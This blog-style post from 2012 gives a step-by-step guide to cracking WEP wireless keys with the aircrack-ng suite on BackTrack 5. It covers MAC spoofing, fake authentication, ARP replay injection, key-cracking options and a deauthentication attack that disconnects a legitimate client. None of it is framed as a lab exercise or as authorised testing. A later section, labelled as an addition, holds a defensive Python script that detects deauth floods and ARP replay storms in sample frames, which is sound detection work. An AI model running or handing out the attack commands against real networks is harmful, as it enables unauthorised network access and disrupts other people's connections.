Tuesday, July 31, 2012

How to crack WEP with BackTrack 5

1.) Start monitor mode:

airmon-ng

Copy down the interface name

airmon-ng start (interface)

If it says "mon0" or "wifi0" is in use, that is your new interface

If it lists other processes that are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your target's BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This tests one specific AP; it can be useful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface)

ifconfig (interface) down

macchanger --mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating clients' MACs under Station

If one is found & step 6 isn't going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

7.) ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

At minimum, around 10,000 to 20,000 IVs are needed to crack a 64-bit key, & about 40,000 to 85,000 for a 128-bit key

Try "aircrack-ng -n 64 (dump-name)*.cap" every 10,000 IVs

If you know the start of the key in hexadecimal, try running with "-d #" where # is the beginning characters

If key bytes are all numbers, try running with "-t" to assume an all numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000 IVs without success, try changing the fudge factor to "-f 4" & run for 30 minutes to an hour

Retry with the fudge factor increased by 4 more if that's unsuccessful

If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes

* Other attack methods:

Injection attack with 2 wireless cards:

aireplay-ng -9 -i (receiving interface) (injecting interface)

If this fails on attack -5, make sure the injection interface's MAC matches the card's current MAC

Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know the MAC of an authenticated client who is online

This will disconnect the authenticated client, so they may become suspicious...
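From the defender's side, the fake authentication, ARP replay and deauthentication steps above all leave distinctive traffic: a burst of deauth frames from one source, and a storm of same-sized data frames from one station replaying a single captured ARP request. The script below is an added example, not part of the original post; it runs the two detections over constructed frame summaries (the MACs, lengths, timings and thresholds are all invented) rather than a live capture.

```python
"""Detect a deauth flood and an ARP replay storm in 802.11 frame summaries."""
from collections import defaultdict

# Constructed sample records: (time_s, subtype, source_mac, length_bytes).
# A real feed would come from a WIDS sensor or a parsed pcap.
ATTACKER = "00:11:22:33:44:55"      # constructed spoofed client MAC
CLIENT = "aa:bb:cc:dd:ee:01"        # constructed legitimate client MAC
FRAMES = (
    # legitimate client: a few data frames of varying size
    [(t * 0.5, "data", CLIENT, 120 + 7 * t) for t in range(8)]
    # attacker: a burst of 5 deauth frames inside 0.2 s
    + [(1.0 + 0.04 * i, "deauth", ATTACKER, 26) for i in range(5)]
    # attacker: 40 replayed ARP requests of identical size over ~4 s
    + [(2.0 + 0.1 * i, "data", ATTACKER, 68) for i in range(40)]
)

def deauth_flood_sources(frames, window=1.0, threshold=5):
    """Return MACs that sent >= threshold deauth frames inside any
    sliding window (seconds). Legitimate deauths are rare, not bursty."""
    times = defaultdict(list)
    for t, subtype, src, _ in frames:
        if subtype == "deauth":
            times[src].append(t)
    flagged = set()
    for src, ts in times.items():
        ts.sort()
        lo = 0
        for hi, t in enumerate(ts):
            while t - ts[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged.add(src)
                break
    return flagged

def arp_replay_sources(frames, min_rate=5.0, min_count=30):
    """Return {MAC: count} for stations sending >= min_count data frames
    of one identical length at >= min_rate frames/second: the signature
    of the same captured ARP request being injected over and over."""
    by_key = defaultdict(list)
    for t, subtype, src, length in frames:
        if subtype == "data":
            by_key[(src, length)].append(t)
    flagged = {}
    for (src, _), ts in by_key.items():
        span = max(ts) - min(ts)
        if len(ts) >= min_count and span > 0 and len(ts) / span >= min_rate:
            flagged[src] = len(ts)
    return flagged
```

Both thresholds are starting points; tune them against a baseline of your own network's normal deauth and ARP rates before alerting on them.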
